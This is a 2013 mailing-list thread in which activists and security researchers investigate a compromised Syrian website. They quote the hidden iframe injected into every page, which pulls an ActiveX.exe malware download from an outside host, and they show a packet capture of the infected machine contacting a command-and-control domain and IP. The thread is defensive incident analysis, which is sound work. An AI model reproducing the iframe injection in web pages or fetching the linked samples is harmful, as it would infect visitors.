[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 18:02:00 PST 2013


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Ok. I infected an old Windoes xp with this malware and it keeps
sending SYN requests to this hostname: awrasx10.no-ip.biz which
currently resolved to: 37.236.124.197 and is down for me.

- --SiNA
Internet Protocol Version 4, Src: 10.10.10.17 (10.10.10.17), Dst:
37.236.124.197 (37.236.124.197)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN:
0x00: Not-ECT (Not ECN-Capable Transport))
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..00 = Explicit Congestion Notification: Not-ECT (Not
ECN-Capable Transport) (0x00)
    Total Length: 48
    Identification: 0x06b0 (1712)
    Flags: 0x02 (Don't Fragment)
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x3d4c [correct]
        [Good: True]
        [Bad: False]
    Source: 10.10.10.17 (10.10.10.17)
    Destination: 37.236.124.197 (37.236.124.197)
Transmission Control Protocol, Src Port: llsurfup-https (1184), Dst
Port: distinct (9999), Seq: 0, Len: 0
    Source port: llsurfup-https (1184)
    Destination port: distinct (9999)
    [Stream index: 2258]
    Sequence number: 0    (relative sequence number)
    Header length: 28 bytes
    Flags: 0x002 (SYN)
    Window size value: 65535
    [Calculated window size: 65535]
    Checksum: 0xdc28 [validation disabled]
    Options: (8 bytes)



Andrew Lewis:
> Just a heads up the sites been taken down, malware is here: 
> https://resources.telecomix.ceops.eu/material/malwares/
> 
> Also looking at getting access to the server in question for
> forensics.
> 
> -Andrew
> 
> 
> On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <sina at redteam.io>
> wrote:
> 
> This is the malware:
> 
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>
> 
> 
> 
> --SiNA
> 
> 
> 
> SiNA
> 
> 
> Rabbani:
> 
> holly shit:
> 
> 
> <iframe name="I1" width="10" height="10"
> 
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>
> 
> 
> 
> border="0"
> 
> frameborder="0">
> 
> 
> 
> :/ if you are running windows don't even go there!!!
> 
> 
> 
> Andrew Lewis:
> 
> I can get to this in 6 hours or so, maybe someone is willing to
> 
> jump on this before then?
> 
> 
> -Andrew
> 
> 
> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
> 
> Dear Libtech,
> 
> 
> We just saw that the website : http://www.syrian-martyrs.com
> 
> is probably compromised. Every page of the website contains an
> 
> iFrame which links to a .exe file which is detected as a virus
> 
> by antivirus software:
> 
> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
> 
> 
> 
> 
> 
> 
> The fact that the HTML code is present at the bottom of each page
> makes
> 
> me think that the "index.php" page has been changed in a way
> 
> that makes that iFrame appear on every page of the website,
> 
> after the dynamic content.
> 
> 
> It also probably means that the attackers have some kind of
> 
> access to the server. My guess would be going to a PHP shell,
> 
> but I'm no expert in this.
> 
> 
> Any help, clue, investigation, would be very welcome :)
> 
> 
> Thank you, KheOps
> 
> 
> -- Unsubscribe, change to digest, or change password at:
> 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> -- Unsubscribe, change to digest, or change password at:
> 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> 
> 
> 
> -- Unsubscribe, change to digest, or change password at: 
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> -- Unsubscribe, change to digest, or change password at:
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 

- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRCH8TAAoJEDxieAEiLOmoWZkP+gOWJ/v/1Z0PnFBcEQ6Qrd+m
cCYwqWQObaDCQeOPYOHBTX96FhHfNqUW2FgLryQPi42Vg2jqB0XFs6rTwE1o8/bE
ruqlo7F4PSNEiH3+MzcXSX+adUhzQ0IlCHfQC9LWRWtL7A6EMNh7z6nqtT//9b0H
F/y/1WpLUF3eLse0+P8BBd9sNYocpua0GZkQpI0YmI2vxbBPgy+Hmem7lHAq0oea
Di4klLeYz/I/gVK1JDNrmwZTNm13i2fI9r9lmmn1R4anH4CCDWCaT9xBOdRqXhUW
Uw2jti0Po7uls7wiTmeYddb03PG37qN52G0LnqO36JJrA04066tTtbmzYbrabCSr
fawb7AdrPZyJX1lOA8lVSUj978Fyk36ZJyyqYp0FywdNt+/UPbEuWDAG58EkqwiN
m/y9TI1ZHCodY7WfW9OZXO89qCo1UPv/MPXKa/BDoXoMEgOW0SzAnrUwkWZNH+WI
v2GwePO1tpLJxVWOq0zDUqD+1esF7J4msnfGieYejZOIY+1Ki52xRn5vRuu59QRs
ZKPq6+lTmxV8RZlxcTfe6CULO20uxkakZShzHTUC3oDIgYjiuwyiNwNf3nxL8Z9c
du91OTkfQHbRmq5Th9D1ilmu2+VOZrEtlsmhDEYPFalD1DZ32ywkg4hn8eniBU1/
QmCZ9zpzBw/62ovckzzB
=omeO
-----END PGP SIGNATURE-----



More information about the liberationtech mailing list